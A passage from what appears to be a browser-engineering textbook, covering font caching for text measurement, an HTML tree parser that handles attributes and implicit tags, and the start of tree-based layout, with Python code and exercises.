of annotating it, are like this. Some people like adding a final slash
to self-closing tags, like <br/>
, but this is not
required in HTML. ends the current line and starts a new
one:
def token(self, tok):
    # ...
    elif tok.tag == "br":
        self.flush()
Likewise, paragraphs are defined by the <p>
and
</p>
tags, so </p>
also ends the
current line:
def token(self, tok):
    # ...
    elif tok.tag == "/p":
        self.flush()
        self.cursor_y += VSTEP
I add a bit extra to cursor_y
here to create a little
gap between paragraphs.
Actually, browsers support not only horizontal but also vertical writing systems, like some traditional East Asian writing styles. A particular challenge is Mongolian script.
Now that you’ve implemented styled text, you’ve probably
noticed—unless you’re on macOSWhile we can’t confirm this in the documentation, it seems
that the macOS “Core Text” APIs cache fonts more aggressively than Linux
and Windows. The optimization described in this section won’t hurt any
on macOS, but also won’t improve speed as much as on Windows and
Linux.—that on a large web page like this chapter your
browser has slowed significantly from the last
chapter. That’s because text layout, and specifically the part where
you measure each word, is quite slow.You can profile Python programs by replacing your
python3
command with python3 -m cProfile
. Look
for the lines corresponding to the measure
and
metrics
calls to see how much time is spent measuring
text.
Unfortunately, it’s hard to make text measurement much faster. With proportional fonts and complex font features like hinting and kerning, measuring text can require pretty complex computations. But on a large web page, some words likely appear a lot—for example, this page includes the word “the” over two hundred times. Instead of measuring these words over and over again, we could measure them once, and then cache the results. On normal English text, this usually results in a substantial speedup.
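The caching idea can be seen in miniature with Python’s functools.lru_cache and a stand-in for the slow measurement call (slow_measure here is a made-up function, not part of Tk):

```python
import functools
import time

# Hypothetical stand-in for an expensive text-measurement call.
def slow_measure(word):
    time.sleep(0.001)  # pretend this is font rasterization work
    return 8 * len(word)

# Memoize: each distinct word is measured only once.
@functools.lru_cache(maxsize=None)
def measure(word):
    return slow_measure(word)

measure("the")  # slow the first time
measure("the")  # instant: served from the cache
```

The get_font cache the chapter builds next plays the same role for Font objects, which in turn lets Tk’s own internal measurement caches do their job.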
Caching is such a good idea that most text libraries already
implement it. But because our word method creates a new
Font object for each word, our browser isn’t taking
advantage of that caching. If we only made a new Font
object when we had to, the built-in caches would work better and our
browser would be faster. So we’ll need our own cache, so that we can
reuse Font objects and have our text measurements
cached.
We’ll store our cache in a global FONTS
dictionary:
FONTS = {}
The keys to this dictionary will be size/weight/style triples, and
the values will be Font
objects. We can put the caching
logic itself in a new get_font
function:
def get_font(size, weight, slant):
    key = (size, weight, slant)
    if key not in FONTS:
        font = tkinter.font.Font(size=size, weight=weight, slant=slant)
        FONTS[key] = font
    return FONTS[key]
Now, inside the word method we can call
get_font instead of creating a Font object
directly:
class Layout:
    def word(self, word):
        font = get_font(self.size, self.weight, self.style)
        # ...
Fonts for scripts like Chinese can be megabytes in size, so they are generally stored on disk and only loaded into memory on-demand. That makes font loading slow. Browsers also have extensive caches for measuring, shaping, and rendering text. Because web pages have a lot of text, these caches turn out to be one of the most important parts of speeding up rendering.
The last chapter introduced a browser that laid out Chinese text. Now it does English, too:
You can now use your browser to read an essay, a blog post, or a book!
The complete set of functions, classes, and methods in our browser should look something like this:
class URL:
    def __init__(url)
    def request()

WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP

class Browser:
    def __init__()
    def load(url)
    def draw()
    def scrolldown(e)

class Text:
    def __init__(text)
    def __repr__()

class Tag:
    def __init__(tag)
    def __repr__()

def lex(body)

FONTS

def get_font(size, weight, slant)

class Layout:
    def __init__(tokens)
    def token(tok)
    def word(word)
    def flush()

if __name__ == "__main__"
Centered Text: This book’s page titles are centered: find
them between <h1 class="title">
and
</h1>
. Make your browser center the text in these
titles. Each line has to be centered individually, because different
lines will have different lengths.
Superscripts: Add support for the <sup>
tag: text in this tag should be smaller (perhaps half the normal text
size) and be placed so that the top of a superscript lines up with the
top of a normal letter.
Soft hyphens: The soft hyphen character, written
\N{soft hyphen}
in Python, represents a place where the
text renderer can, but doesn’t have to, insert a hyphen and break the
word across lines. Add support for it.If you’ve done a previous
exercise on HTML entities, you might also want to add support for
the &shy; entity, which expands to a soft
entity, which expands to a soft
hyphen. If a word doesn’t fit at the end of a line, check
if it has soft hyphens, and if so break the word across lines. Remember
that a word can have multiple soft hyphens in it, and make sure to draw
a hyphen when you break a word. The word
“supercalafragalisticexpialadoshus” is a good test case.
Small caps: Make the <abbr>
element
render text in small caps, like this. Inside an
<abbr>
tag, lower-case letters should be small,
capitalized, and bold, while all other characters (upper case, numbers,
etc) should be drawn in the normal font.
Preformatted text: Add support for the
<pre>
tag. Unlike normal paragraphs, text inside
<pre>
tags doesn’t automatically break lines, and
whitespace like spaces and newlines are preserved. Use a fixed-width
font like Courier New
or SFMono
as well. Make
sure tags work normally inside <pre>
tags: it should
be possible to bold some text inside a <pre>
.
So far, your web browser sees web pages as a stream of open tags, close tags, and text. But HTML is actually a tree, and though the tree structure hasn’t been important yet, it will be once backgrounds, margins, and CSS enter the picture. So this chapter adds a proper HTML parser and converts the layout engine to use it.
The HTML treeThis is
the tree that is usually called the DOM tree, for Document
Object Model. We’ll keep calling it the HTML tree for
now. has one node for each open and close tag pair and for
each span of text.In
reality there are other types of nodes too, like comments, doctypes,
CDATA sections, and processing instructions. There are even
some deprecated types! So for our browser to build a tree,
tokens need to evolve into nodes. That means adding a list of children
and a parent pointer to each one. Here’s the new Text
class:The
children
field of a Text
node will always be
empty; I’m defining it here to make it easier to write code that handles
Text
and Element
nodes
simultaneously.
class Text:
    def __init__(self, text, parent):
        self.text = text
        self.children = []
        self.parent = parent
Since it takes two tags (the open and the close tag) to make a node,
let’s rename the Tag
class to Element
, and
make it look like this:
class Element:
    def __init__(self, tag, parent):
        self.tag = tag
        self.children = []
        self.parent = parent
I added a children
field to both Text
and
Element
, even though text nodes never have children. That’s
for consistency, to avoid isinstance
calls throughout the
code.
Constructing a tree of nodes from source code is called parsing. A parser builds a tree one element or text node at a time. But that means the parser needs to store an incomplete tree. For example, suppose the parser has so far read this bit of HTML:
<html><head></head><body><h1>This is my webpage
The parser has seen five tags (and one text node). The rest of the
HTML will contain more open tags, close tags, and text; but no matter
which tokens it sees, no new nodes will be added to the
<head>
tag, which has already been closed. So that
node is “finished”. But the other nodes are unfinished: more children
can be added to the <html>
,
<body>
, and <h1>
nodes, depending
on what HTML comes next.
Since the parser reads the HTML file from left to right, these unfinished tags are always in a certain part of the tree. The unfinished tags have always been opened but not yet closed; they are always to the right of the finished nodes; and they are always children of other unfinished tags. To leverage these facts, let’s represent an incomplete tree by storing a list of unfinished tags, ordered with parents before children. The first node in the list is the root of the HTML tree; the last node in the list is the most recent unfinished tag.In Python, and most other languages, it’s faster to add and remove from the end of a list, instead of the beginning.
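To make that invariant concrete, here is a toy simulation (tag names as plain strings, ignoring text, attributes, and edge cases) of how the unfinished list evolves:

```python
def simulate(tags):
    """Track which tags are still unfinished after a tag stream.

    A toy model of the parser's bookkeeping: open tags push onto
    the list, close tags pop the most recent one off.
    """
    unfinished = []
    for t in tags:
        if t.startswith("/"):
            unfinished.pop()   # that node is now finished
        else:
            unfinished.append(t)
    return unfinished

# After parsing "<html><head></head><body><h1>":
simulate(["html", "head", "/head", "body", "h1"])
# -> ["html", "body", "h1"]: root first, parents before children
```

Note how the finished head disappears from the list, while the still-open tags remain in parent-to-child order.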
Parsing is a little more complex than lex
, so we’re
going to want to break it into several functions, organized in a new
HTMLParser
class. That class can also store the source code
it’s analyzing and the incomplete tree:
class HTMLParser:
    def __init__(self, body):
        self.body = body
        self.unfinished = []
Before the parser starts, it hasn’t seen any tags at all, so the
unfinished
list storing the tree starts empty. But as the
parser reads tokens, that list fills up. Let’s start that by renaming
the lex
function we have now, aspirationally, to
parse
:
class HTMLParser:
    def parse(self):
        # ...
We’ll need to do a bit of surgery on parse
. Right now
parse
creates Tag
and Text
objects and appends them to the out
array. We need it to
create Element
and Text
objects and add them
to the unfinished
tree. Since a tree is a bit more complex
than a list, I’ll move the adding-to-a-tree logic to two new methods
add_text
and add_tag
.
def parse(self):
    text = ""
    in_tag = False
    for c in self.body:
        if c == "<":
            in_tag = True
            if text: self.add_text(text)
            text = ""
        elif c == ">":
            in_tag = False
            self.add_tag(text)
            text = ""
        else:
            text += c
    if not in_tag and text:
        self.add_text(text)
    return self.finish()
The out
variable is gone, and note that I’ve also moved
the return value to a new finish
method, which converts the
incomplete tree to the final, complete tree. So: how do we add things to
the tree?
HTML derives from a long line of document processing systems. Its
predecessor, SGML,
traces back to RUNOFF and is
a sibling to troff, now used for Linux
man pages. The committee that
standardized SGML now works on the .odf
,
.docx
, and .epub
formats.
Let’s talk about adding nodes to a tree. To add a text node we add it as a child of the last unfinished node:
class HTMLParser:
    def add_text(self, text):
        parent = self.unfinished[-1]
        node = Text(text, parent)
        parent.children.append(node)
On the other hand, tags are a little more complex since they might be an open or a close tag:
class HTMLParser:
    def add_tag(self, tag):
        if tag.startswith("/"):
            # ...
        else:
            # ...
A close tag removes an unfinished node, by finishing it, and adds it to the next unfinished node in the list:
def add_tag(self, tag):
    if tag.startswith("/"):
        node = self.unfinished.pop()
        parent = self.unfinished[-1]
        parent.children.append(node)
    # ...
An open tag instead adds an unfinished node to the end of the list:
def add_tag(self, tag):
    # ...
    else:
        parent = self.unfinished[-1]
        node = Element(tag, parent)
        self.unfinished.append(node)
Once the parser is done, it turns our incomplete tree into a complete tree by just finishing any unfinished nodes:
class HTMLParser:
    def finish(self):
        if len(self.unfinished) == 0:
            self.add_tag("html")
        while len(self.unfinished) > 1:
            node = self.unfinished.pop()
            parent = self.unfinished[-1]
            parent.children.append(node)
        return self.unfinished.pop()
This is almost a complete parser, but it doesn’t quite work at the beginning and end of the document. The very first open tag is an edge case without a parent:
def add_tag(self, tag):
    # ...
    else:
        parent = self.unfinished[-1] if self.unfinished else None
        # ...
The very last tag is also an edge case, because there’s no unfinished node to add it to:
def add_tag(self, tag):
    if tag.startswith("/"):
        if len(self.unfinished) == 1: return
        # ...
Ok, that’s all done. Let’s test our parser out and see how well it works!
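If you want a self-contained sanity check before building the pretty-printer, here is the parser assembled from the snippets so far (doctype handling and attributes come later in the chapter):

```python
class Text:
    def __init__(self, text, parent):
        self.text = text
        self.children = []
        self.parent = parent

class Element:
    def __init__(self, tag, parent):
        self.tag = tag
        self.children = []
        self.parent = parent

class HTMLParser:
    def __init__(self, body):
        self.body = body
        self.unfinished = []

    def parse(self):
        text = ""
        in_tag = False
        for c in self.body:
            if c == "<":
                in_tag = True
                if text: self.add_text(text)
                text = ""
            elif c == ">":
                in_tag = False
                self.add_tag(text)
                text = ""
            else:
                text += c
        if not in_tag and text:
            self.add_text(text)
        return self.finish()

    def add_text(self, text):
        parent = self.unfinished[-1]
        node = Text(text, parent)
        parent.children.append(node)

    def add_tag(self, tag):
        if tag.startswith("/"):
            # Don't pop the root: closing the last tag is a no-op.
            if len(self.unfinished) == 1: return
            node = self.unfinished.pop()
            parent = self.unfinished[-1]
            parent.children.append(node)
        else:
            # The very first tag has no parent.
            parent = self.unfinished[-1] if self.unfinished else None
            node = Element(tag, parent)
            self.unfinished.append(node)

    def finish(self):
        if len(self.unfinished) == 0:
            self.add_tag("html")
        while len(self.unfinished) > 1:
            node = self.unfinished.pop()
            parent = self.unfinished[-1]
            parent.children.append(node)
        return self.unfinished.pop()
```

Parsing `<html><body><h1>Hi!</h1></body></html>` with this sketch yields an html root with a body child, an h1 grandchild, and a Text node inside that.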
The ill-considered Javascript document.write
method
allows Javascript to modify the HTML source code while it’s being
parsed! Modern browsers use speculative
parsing to make this fast and avoid evaluating Javascript while
parsing.
How do we know our parser does the right thing—that it builds the right tree? Well the place to start is seeing the tree it produces. We can do that with a quick, recursive pretty-printer:
def print_tree(node, indent=0):
    print(" " * indent, node)
    for child in node.children:
        print_tree(child, indent + 2)
Here we’re printing each node in the tree, and using indentation to
show the tree structure. Since we need to print each node, it’s worth
taking the time to give them a nice printed form, which in Python means
defining the __repr__
function:
class Text:
    def __repr__(self):
        return repr(self.text)

class Element:
    def __repr__(self):
        return "<" + self.tag + ">"
Try this out on this web page, parsing the HTML source code and then
calling print_tree
to visualize it:
headers, body = URL(sys.argv[1]).request()
nodes = HTMLParser(body).parse()
print_tree(nodes)
Run it on this web page, and you’ll see something like this:
 <!doctype html>
   '\n'
   <html lang="en-US" xml:lang="en-US">
     '\n'
     <head>
       '\n '
       <meta charset="utf-8" />
         '\n '
         <meta name="generator" content="pandoc" />
           '\n '
Immediately a couple of things stand out. Let’s start at the top,
with the <!doctype html>
tag.
This special tag, called a doctype, is always the very first thing in an HTML document. But it’s not really an element at all, nor is it supposed to have a close tag. Our toy browser won’t be using the doctype for anything, so it’s best to throw it away:Real browsers use doctypes to switch between standards-compliant and legacy parsing and layout modes.
def add_tag(self, tag):
    if tag.startswith("!"): return
    # ...
This ignores all tags that start with an exclamation mark, which not
only throws out doctype declarations but also most comments, which in
HTML are written <!-- comment text -->
.
Just throwing out doctypes isn’t quite enough though—if you run your
parser now, it will crash. That’s because after the doctype comes a
newline, which our parser treats as text and tries to insert into the
tree. Except there isn’t a tree, since the parser hasn’t seen any open
tags. For simplicity, let’s just have our browser skip whitespace-only
text nodes to side-step the problem:Real browsers retain whitespace to correctly render
make<span></span>up
as one word and
make<span> </span>up
as two. Our browser won’t.
Plus, ignoring whitespace simplifies later
chapters by avoiding a special-case for whitespace-only text
tags.
def add_text(self, text):
    if text.isspace(): return
    # ...
The parsed HTML tree now looks like this:
 <html lang="en-US" xml:lang="en-US">
   <head>
     <meta charset="utf-8" />
       <meta name="generator" content="pandoc" />
         <meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=yes" />
           <meta name="author" content="Pavel Panchekha & Chris Harrelson" />
             <link rel="stylesheet" href="book.css" />
               <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Vollkorn%7CLora&display=swap" />
                 <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Vollkorn:400i%7CLora:400i&display=swap" />
                   <title>
Why’s everything so deeply indented? Why aren’t these open elements ever closed?
In SGML, document type declarations had a URL to define the valid
tags. Browsers use the absence of a document type declaration to identify
very old, pre-SGML versions of HTML,There’s also this crazy thing called “almost standards” or “limited
quirks” mode, due to a backwards-incompatible change in table cell
vertical layout. Yes. I don’t need to make these up! but
don’t use the URL, so <!doctype html>
is the best
document type declaration for HTML.
Elements like <meta>
and <link>
are what are called self-closing: these tags don’t surround content, so
you don’t ever write </meta>
or
</link>
. Our parser needs special support for them.
In HTML, there’s a specific
list of these self-closing tags (the spec calls them “void”
tags):A lot of these
tags are obscure. Browsers also support some additional, obsolete
self-closing tags not listed here, like
keygen
.
SELF_CLOSING_TAGS = [
    "area", "base", "br", "col", "embed", "hr", "img", "input",
    "link", "meta", "param", "source", "track", "wbr",
]
Our parser needs to auto-close tags from this list:
def add_tag(self, tag):
    # ...
    elif tag in self.SELF_CLOSING_TAGS:
        parent = self.unfinished[-1]
        node = Element(tag, parent)
        parent.children.append(node)
This code is right, but if you test it out it won’t seem to help. Why
not? Our parser is looking for a tag named meta
, but it’s
finding a tag named “meta name=...
”. The self-closing code
isn’t triggered because the <meta>
tag has
attributes.
HTML attributes add information about an element; open tags can have any number of attributes. Attribute values can be quoted, unquoted, or omitted entirely. Let’s focus on basic attribute support, ignoring values that contain whitespace, which are a little complicated.
Since we’re not handling whitespace in values, we can split on whitespace to get the tag name and the attribute-value pairs:
class HTMLParser:
    def get_attributes(self, text):
        parts = text.split()
        tag = parts[0].lower()
        attributes = {}
        for attrpair in parts[1:]:
            # ...
        return tag, attributes
HTML tag names are case-insensitive,This is not the right way to do case-insensitive comparisons; the Unicode case folding algorithm should be used if you want to handle languages other than English. But in HTML specifically, tag names only use the ASCII characters so lower-casing them is sufficient. as by the way are attribute names, so I convert them to lower case. Then, inside the loop, I split each attribute-value pair into a name and a value. The easiest case is an unquoted attribute, where an equal sign separates the two:
def get_attributes(self, text):
    # ...
    for attrpair in parts[1:]:
        if "=" in attrpair:
            key, value = attrpair.split("=", 1)
            attributes[key.lower()] = value
    # ...
The value can also be omitted, like in
<input disabled>
, in which case the attribute value
defaults to the empty string:
for attrpair in parts[1:]:
    # ...
    else:
        attributes[attrpair.lower()] = ""
Finally, the value can be quoted, in which case the quotes have to be stripped out:Quoted attributes allow whitespace between the quotes. That requires something like a finite state machine instead of just splitting on whitespace.
if "=" in attrpair:
    # ...
    if len(value) > 2 and value[0] in ["'", "\""]:
        value = value[1:-1]
    # ...
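Putting the three cases together, here is a standalone sketch of this attribute parser, written as a plain function outside the class so it is easy to test. It mirrors the code above, including its known limitation around whitespace inside values:

```python
def get_attributes(text):
    # Split on whitespace: the first part is the tag name,
    # the rest are attribute-value pairs.
    parts = text.split()
    tag = parts[0].lower()
    attributes = {}
    for attrpair in parts[1:]:
        if "=" in attrpair:
            # Split on the first equals sign only, since values
            # can themselves contain equals signs.
            key, value = attrpair.split("=", 1)
            if len(value) > 2 and value[0] in ["'", "\""]:
                value = value[1:-1]  # strip matching quotes
            attributes[key.lower()] = value
        else:
            # Value omitted, as in <input disabled>:
            # default to the empty string.
            attributes[attrpair.lower()] = ""
    return tag, attributes

tag, attrs = get_attributes('meta name=viewport content="width=80"')
# tag == "meta"; attrs == {"name": "viewport", "content": "width=80"}
```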
We’ll store these attributes inside Element
s:
class Element:
def __init__(self, tag, attributes, parent):
self.tag = tag
self.attributes = attributes
# ...
That means we’ll need to call get_attributes
at the top
of add_tag
, to get the attributes
we need to
construct an Element
.
def add_tag(self, tag):
    tag, attributes = self.get_attributes(tag)
    # ...
Remember to use tag and attributes instead of text in add_tag, and try your parser again:
<html>
<head>
<meta>
<meta>
<meta>
<meta>
<link>
<link>
<link>
<title>
It’s close! Yes, if you print the attributes, you’ll see that
attributes with whitespace (like author
on the fourth
meta
tag) are mis-parsed as multiple attributes, and the
final slash on the self-closing tags is incorrectly treated as an extra
attribute. A better parser would fix these issues. But let’s instead
leave our parser as is—these issues aren’t going to be a problem for the
toy browser we’re building—and move on to integrating it with our
browser.
Putting a slash at the end of self-closing tags, like
<br/>
, became fashionable when XHTML looked like it might
replace HTML, and old-timers like me never broke the habit. But unlike
in XML, in HTML
self-closing tags are identified by name, not by some special syntax, so
the slash is optional.
Right now, the Layout
class works token-by-token; we now
want it to go node-by-node instead. So let’s separate the old
token
method into three parts: all the cases for open tags
will go into a new open_tag
method; all the cases for close
tags will go into a new close_tag
method; and instead of
having a case for text tokens our browser can just call the existing
text
method directly:
class Layout:
def open_tag(self, tag):
if tag == "i":
self.style = "italic"
# ...
def close_tag(self, tag):
if tag == "i":
self.style = "roman"
# ...
Now we need the Layout
object to walk the node tree,
calling open_tag
, close_tag
, and
text
in the right order:
def recurse(self, tree):
if isinstance(tree, Text):
for word in tree.text.split():
self.word(word)
else:
self.open_tag(tree.tag)
for child in tree.children:
self.recurse(child)
self.close_tag(tree.tag)
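To see the traversal order this produces, here is a minimal sketch with stand-in Text and Element classes that records events instead of laying anything out. The class names match the parser’s node types, but these are simplified stand-ins for testing only:

```python
# Minimal stand-ins for the node classes, just to show traversal order.
class Text:
    def __init__(self, text):
        self.text = text

class Element:
    def __init__(self, tag, children):
        self.tag, self.children = tag, children

def recurse(tree, events):
    # Same shape as the recurse method above, but recording events
    # instead of calling word, open_tag, and close_tag.
    if isinstance(tree, Text):
        for word in tree.text.split():
            events.append(("word", word))
    else:
        events.append(("open", tree.tag))
        for child in tree.children:
            recurse(child, events)
        events.append(("close", tree.tag))

tree = Element("body", [Element("b", [Text("hi there")])])
events = []
recurse(tree, events)
# events: open body, open b, word hi, word there, close b, close body
```

Note that the close event for an element comes only after all of its descendants have been visited, which is exactly why bold text inside a tag stays bold until that tag’s close_tag call.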
The Layout
constructor can now call recurse
instead of looping through the list of tokens. We’ll also need the
browser to construct the node tree, like this:
class Browser:
def load(self, url):
        headers, body = url.request()
        self.nodes = HTMLParser(body).parse()
        self.display_list = Layout(self.nodes).display_list
        self.draw()
Run it—the browser should now work off of the parsed HTML tree.
Prior to the invention of CSS, some browsers supported web page
styling using attributes like bgcolor
and
vlink
(the color of visited links) and tags like
font
. These are
obsolete, but browsers still support some of them.
The parser now handles HTML pages correctly—at least when the HTML is
written by the sorts of goody-two-shoes programmers who remember the
<head>
tag, close every open tag, and make their bed
in the morning. Mere mortals lack such discipline and so browsers also
have to handle broken, confusing, headless HTML. In fact, modern HTML
parsers are capable of transforming any string of characters
into an HTML tree, no matter how confusing the markup.Yes, it’s crazy, and for a few
years in the early ’00s the W3C tried to do away with it. They
failed.
The full algorithm is, as you might expect, complicated beyond belief, with dozens of ever-more-special cases forming a taxonomy of human error, but one of its nicer features is implicit tags. Normally, an HTML document starts with a familiar boilerplate:
<!doctype html>
<html>
<head>
</head>
<body>
</body>
</html>
In reality, all of these tags except the doctype are
optional: browsers insert them automatically. Let’s add support for
implicit tags to our browser via a new implicit_tags
function that adds implicit tags when the web page omits them. We’ll
want to call it in both add_text
and
add_tag
:
class HTMLParser:
def add_text(self, text):
if text.isspace(): return
self.implicit_tags(None)
# ...
def add_tag(self, tag):
    tag, attributes = self.get_attributes(tag)
    if tag.startswith("!"): return
    self.implicit_tags(tag)
    # ...
Note that implicit_tags
isn’t called for the ignored
whitespace and doctypes. The argument to implicit_tags
is
the tag name (or None
for text nodes), which we’ll compare
to the list of unfinished tags to determine what’s been omitted:
class HTMLParser:
    def implicit_tags(self, tag):
        while True:
            open_tags = [node.tag for node in self.unfinished]
            # ...
implicit_tags has a loop because more than one tag could have been omitted in a row; each iteration around the loop adds just one. Determining which implicit tag to add, if any, requires examining the open tags and the tag being inserted.
Let’s start with the easiest case, the implicit
<html>
tag. An implicit <html>
tag
is necessary if the first tag in the document is something other than
<html>
:
while True:
# ...
if open_tags == [] and tag != "html":
self.add_tag("html")
Both <head>
and <body>
can also
be omitted, but to figure out which it is we need to look at which tag
is being added:
while True:
# ...
elif open_tags == ["html"] \
and tag not in ["head", "body", "/html"]:
if tag in self.HEAD_TAGS:
self.add_tag("head")
else:
self.add_tag("body")
Here, HEAD_TAGS
lists the tags that you’re supposed to
put into the <head>
element:The
<script>
tag can go in either the head or the body
section, but it goes into the head by default.
class HTMLParser:
    HEAD_TAGS = [
        "base", "basefont", "bgsound", "noscript",
        "link", "meta", "title", "style", "script",
    ]
Note that if both the <html>
and
<head>
tags are omitted, implicit_tags
is going to insert both of them by going around the loop twice. In the
first iteration open_tags
is []
, so the code
adds an <html>
tag; then, in the second iteration,
open_tags
is ["html"]
so it adds a
<head>
tag.These add_tag
methods themselves call
implicit_tags
, which means you can get into an infinite
loop if you forget a case. Remember that every time you add a tag in
implicit_tags
, that tag itself shouldn’t trigger more
implicit tags.
Finally, the </head>
tag can also be implicit, if
the parser is inside the <head>
and sees an element
that’s supposed to go in the <body>
:
while True:
# ...
    elif open_tags == ["html", "head"] and \
            tag not in ["/head"] + self.HEAD_TAGS:
        self.add_tag("/head")
Technically, the </body>
and
</html>
tags can also be implicit. But since our
finish
function already closes any unfinished tags, that
doesn’t need any extra code. So all that’s left for implicit_tags is to exit out of the loop:
while True:
# ...
else:
break
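To check the loop’s behavior, here is a standalone sketch that simulates implicit_tags on a plain list of open tag names. The function and its return value are illustrative stand-ins for testing, not the parser’s actual interface, and the HEAD_TAGS list is copied from above:

```python
HEAD_TAGS = ["base", "basefont", "bgsound", "noscript",
             "link", "meta", "title", "style", "script"]

def implicit_tags(open_tags, tag, inserted):
    # Sketch of the loop: open_tags is the list of unfinished tag
    # names; returns the implicit tags inserted before `tag`.
    while True:
        if open_tags == [] and tag != "html":
            open_tags.append("html"); inserted.append("html")
        elif open_tags == ["html"] and tag not in ["head", "body", "/html"]:
            implied = "head" if tag in HEAD_TAGS else "body"
            open_tags.append(implied); inserted.append(implied)
        elif open_tags == ["html", "head"] and \
                tag not in ["/head"] + HEAD_TAGS:
            open_tags.remove("head"); inserted.append("/head")
        else:
            break
    return inserted

# A document starting with <title> gets <html> and <head> inserted
# first; one starting with <p> gets <html> and <body> instead.
```

Note how the loop runs twice for a bare <title>: the first iteration inserts <html>, and only then does the second iteration see ["html"] and insert <head>.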
Of course, there are more rules for handling malformed HTML: formatting tags, nested paragraphs, embedded SVG and MathML, and all sorts of other complexity. Each has complicated rules abounding with edge cases. But let’s end our discussion of handling author errors here.
The rules for malformed HTML may seem arbitrary, and they are: they evolved over years of trying to guess what people “meant” when they wrote that HTML, and are now codified in the HTML parsing standard. Of course, sometimes these rules “guess” wrong—but as so often happens on the web, it’s often more important that every browser does the same thing, rather than each trying to guess what the right thing is.
Thanks to implicit tags, you can mostly skip the
<html>
, <body>
, and
<head>
elements, and they’ll be implicitly added back
for you. Nor does writing them explicitly let you do anything weird; the
HTML parser’s many
states guarantee that there’s only one <head>
and
one <body>
.At least, per document. An HTML file that uses frames or
templates can have more than one <head>
and
<body>
, but they correspond to different
documents.
This chapter taught our browser that HTML is a tree, not just a flat list of tokens. We added: a parser that turns HTML tokens into a tree of Text and Element nodes; code to recognize attributes and self-closing tags; automatic insertion of implicit tags for abbreviated or malformed pages; and a recursive layout pass that walks the node tree.
The tree structure of HTML is essential to display visually complex web pages, as we will see in the next chapter.
The complete set of functions, classes, and methods in our browser should look something like this:
class URL:
def __init__(url)
def request()
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
class Layout:
def __init__(tree)
def token(tok)
def word(word)
def flush()
def recurse(tree)
def open_tag(tag)
def close_tag(tag)
class Browser:
def __init__()
def load(url)
def draw()
def scrolldown(e)
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
if __name__ == "__main__"
Comments: Update the HTML lexer to support comments.
Comments in HTML begin with <!--
and end with
-->
. However, comments aren’t the same as tags: they can
contain any text, including left and right angle brackets. The lexer
should skip comments, not generating any token at all. Check: is
<!-->
a comment, or does it just start one?
Paragraphs: It’s not clear what it would mean for one
paragraph to contain another. Change the parser so that a document like
<p>hello<p>world</p>
results in two
sibling paragraphs instead of one paragraph inside another; real
browsers do this too.
Scripts: JavaScript code embedded in a
<script>
tag uses the left angle bracket to mean
less-than. Modify your lexer so that the contents of
<script>
tags are treated specially: no tags are
allowed inside <script>
, except the
</script>
close tag.Technically it’s just
</script
followed by a space,
tab, \v
, \r
, slash, or greater than sign.
If you need to talk about </script>
tags inside
JavaScript code, you have to split it into multiple
strings.
Quoted attributes: Quoted attributes can contain spaces and
right angle brackets. Fix the lexer so that this is supported properly.
Hint: the current lexer is a finite state machine, with two states
(determined by in_tag
). You’ll need more states.
Syntax Highlighting: Implement the view-source:
protocol as in Chapter 1, but make it
syntax-highlight the source code of HTML pages. Keep source code for
HTML tags in a normal font, but make text contents bold. If you’ve
implemented it, wrap text in <pre>
tags as well to
preserve line breaks. Hint: subclass the HTML parser and use it to
implement your syntax highlighter.
So far, layout has been a linear process that handles open tags and close tags independently. But web pages are trees, and look like them: borders and backgrounds visually nest inside one another. To support that, this chapter switches to tree-based layout, where the tree of elements is transformed into a tree of layout objects for the visual elements of the page. In the process, we’ll make our web pages more colorful with backgrounds.
Right now, our browser lays out an element’s open and close tags
separately. Both tags modify global state, like the
cursor_x
and cursor_y
variables, but they
aren’t otherwise connected, and information about the element as a
whole, like its width and height, is never computed. That makes it
pretty hard to draw a background color behind text. So web browsers
structure layout differently.
In a browser, layout is about producing a layout tree, whose
nodes are layout objects, each associated with an HTML
element,Elements like
<script>
don’t generate layout objects, and some
elements generate multiple (<li>
elements have a
layout object for the bullet point!), but mostly it’s one layout object
each. and each with a size and a position. The browser
walks the HTML tree to produce the layout tree, then computes the size
and position for each layout object, and finally draws each layout
object to the screen.
Let’s start by looking how the existing Layout
class is
used:
class Browser:
def load(self, url):
# ...
self.display_list = Layout(self.nodes).display_list
#...
Here, a Layout
object is created briefly and then thrown
away. Let’s instead make it the beginning of our layout tree by storing
it in a Browser
field:
class Browser:
def load(self, url):
# ...
self.document = Layout(self.nodes)
self.document.layout()
self.display_list = self.document.display_list
#...
Note that I’ve renamed the Layout
constructor to a
layout
method, so that constructing a layout object and
actually laying it out can be different steps. The constructor now just
stores the node it was passed:
class Layout:
def __init__(self, node):
self.node = node
So far, we still don’t have a tree—we just have a single Layout object. To make it into a tree, we’ll need to add child and parent pointers. I’m also going to add a pointer to the previous sibling, because that’ll be useful for computing sizes and positions later:
class Layout:
def __init__(self, node, parent, previous):
self.node = node
self.parent = parent
self.previous = previous
self.children = []
That said, requiring a parent
and previous
element now makes it tricky to construct a Layout
object in
Browser
, since the root of the layout tree obviously can’t
have a parent. To rectify that, let me add a second kind of layout
object to serve as the root of the layout tree.I don’t want to just pass
None
for the parent, because the root layout object also
computes its size and position differently, as we’ll see later this
chapter. I think of that root as the document itself, so
let’s call it DocumentLayout
:
class DocumentLayout:
def __init__(self, node):
self.node = node
self.parent = None
self.children = []
    def layout(self):
        child = Layout(self.node, self, None)
        self.children.append(child)
        child.layout()
        self.display_list = child.display_list
Note an interesting thing about this new layout
method:
its role is to create the child layout objects, and then
recursively call its children’s layout
methods.
This is a common pattern for constructing trees, and we’ll be seeing it
a lot throughout this book.
Now when we construct a DocumentLayout
object inside
load
, we’ll be building a tree! A very short tree, more of
a stump for now, but it’s something!
By the way, since we now have DocumentLayout
, let’s
rename Layout
so it’s less ambiguous. I like
BlockLayout
as a name, because we ultimately want
Layout
to represent a block of text, like a paragraph or a
heading:
class BlockLayout:
# ...
Make sure to rename the Layout
constructor call in
DocumentLayout
as well. Test your browser and make sure
that after all of these refactors, everything still works.
The layout tree isn’t accessible to web developers, so it hasn’t been standardized, and its structure differs between browsers. Even the names don’t match! Chrome calls it a layout tree, Safari a render tree, and Firefox a frame tree.
